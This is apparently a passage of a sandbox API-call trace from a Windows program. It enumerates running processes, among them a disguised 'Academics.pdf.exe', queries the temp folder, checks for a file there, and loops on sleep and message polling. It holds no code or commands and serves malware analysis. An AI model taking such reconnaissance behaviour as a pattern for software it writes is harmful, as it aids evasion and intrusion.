th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0296.046] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0296.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0296.048] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0296.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0296.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0296.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0296.051] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0296.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0296.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0296.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0296.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0296.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.056] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.057] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0296.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.059] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0296.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0296.061] CloseHandle (hObject=0x294) returned 1 [0296.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0296.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0296.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0296.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0296.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0296.062] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0296.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0296.062] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0296.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0296.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0296.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0296.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0296.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0296.062] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0296.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0296.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0296.063] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0296.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0296.063] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0296.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0296.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0296.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0296.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0296.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0296.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0296.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0296.065] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0296.065] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0296.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0296.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0296.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0296.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0296.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0296.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0296.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0296.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0296.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0296.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0296.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0296.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0296.066] timeGetTime () returned 0x49ff5 [0296.066] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.066] Sleep (dwMilliseconds=0xa) [0296.073] timeGetTime () returned 0x4a005 [0296.073] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.073] Sleep (dwMilliseconds=0xa) [0296.088] timeGetTime () returned 0x4a014 [0296.088] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.088] Sleep (dwMilliseconds=0xa) [0296.105] timeGetTime () returned 0x4a024 [0296.105] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.105] Sleep (dwMilliseconds=0xa) [0296.119] timeGetTime () returned 0x4a033 [0296.120] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.120] Sleep (dwMilliseconds=0xa) [0296.135] timeGetTime () returned 0x4a043 [0296.135] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.135] Sleep (dwMilliseconds=0xa) [0296.151] timeGetTime () returned 0x4a053 [0296.151] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.151] Sleep (dwMilliseconds=0xa) [0296.166] timeGetTime () returned 0x4a062 [0296.166] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.166] Sleep (dwMilliseconds=0xa) [0296.185] timeGetTime () returned 0x4a072 [0296.185] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.185] Sleep (dwMilliseconds=0xa) [0296.198] timeGetTime () returned 0x4a081 [0296.198] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.198] Sleep (dwMilliseconds=0xa) [0296.214] timeGetTime () returned 0x4a091 [0296.214] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.214] Sleep (dwMilliseconds=0xa) [0296.230] timeGetTime () returned 0x4a0a1 [0296.230] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.230] Sleep (dwMilliseconds=0xa) [0296.244] timeGetTime () returned 0x4a0b0 [0296.244] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.244] Sleep (dwMilliseconds=0xa) [0296.261] timeGetTime () returned 0x4a0c0 [0296.261] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.261] Sleep (dwMilliseconds=0xa) [0296.276] timeGetTime () returned 0x4a0cf [0296.276] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.276] Sleep (dwMilliseconds=0xa) [0296.291] timeGetTime () returned 0x4a0df [0296.291] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.291] Sleep (dwMilliseconds=0xa) [0296.307] timeGetTime () returned 0x4a0ef [0296.307] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.307] Sleep (dwMilliseconds=0xa) [0296.328] timeGetTime () returned 0x4a0fe [0296.328] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.328] Sleep (dwMilliseconds=0xa) [0296.338] timeGetTime () returned 0x4a10e [0296.339] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.339] Sleep (dwMilliseconds=0xa) [0296.354] timeGetTime () returned 0x4a11d [0296.354] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.354] Sleep (dwMilliseconds=0xa) [0296.375] timeGetTime () returned 0x4a12d [0296.375] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.375] Sleep (dwMilliseconds=0xa) [0296.386] timeGetTime () returned 0x4a13d [0296.386] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.386] Sleep (dwMilliseconds=0xa) [0296.400] timeGetTime () returned 0x4a14c [0296.400] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.400] Sleep (dwMilliseconds=0xa) [0296.416] timeGetTime () returned 0x4a15c [0296.416] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.416] Sleep (dwMilliseconds=0xa) [0296.432] timeGetTime () returned 0x4a16b [0296.432] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.432] Sleep (dwMilliseconds=0xa) [0296.448] timeGetTime () returned 0x4a17b [0296.448] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.448] Sleep (dwMilliseconds=0xa) [0296.463] timeGetTime () returned 0x4a18b [0296.463] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.463] Sleep (dwMilliseconds=0xa) [0296.479] timeGetTime () returned 0x4a19a [0296.479] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.479] Sleep (dwMilliseconds=0xa) [0296.494] timeGetTime () returned 0x4a1aa [0296.494] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.494] Sleep (dwMilliseconds=0xa) [0296.511] timeGetTime () returned 0x4a1b9 [0296.511] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.511] Sleep (dwMilliseconds=0xa) [0296.525] timeGetTime () returned 0x4a1c9 [0296.525] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.525] Sleep (dwMilliseconds=0xa) [0296.541] timeGetTime () returned 0x4a1d9 [0296.541] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.541] Sleep (dwMilliseconds=0xa) [0296.557] timeGetTime () returned 0x4a1e8 [0296.557] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.557] Sleep (dwMilliseconds=0xa) [0296.578] timeGetTime () returned 0x4a1f8 [0296.578] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.578] Sleep (dwMilliseconds=0xa) [0296.588] timeGetTime () returned 0x4a207 [0296.588] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.588] Sleep (dwMilliseconds=0xa) [0296.603] timeGetTime () returned 0x4a217 [0296.603] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.603] Sleep (dwMilliseconds=0xa) [0296.619] timeGetTime () returned 0x4a227 [0296.619] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.619] Sleep (dwMilliseconds=0xa) [0296.634] timeGetTime () returned 0x4a236 [0296.634] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.634] Sleep (dwMilliseconds=0xa) [0296.650] timeGetTime () returned 0x4a246 [0296.650] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.650] Sleep (dwMilliseconds=0xa) [0296.665] timeGetTime () returned 0x4a255 [0296.666] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.666] Sleep (dwMilliseconds=0xa) [0296.681] timeGetTime () returned 0x4a265 [0296.681] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.681] Sleep (dwMilliseconds=0xa) [0296.697] timeGetTime () returned 0x4a275 [0296.697] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 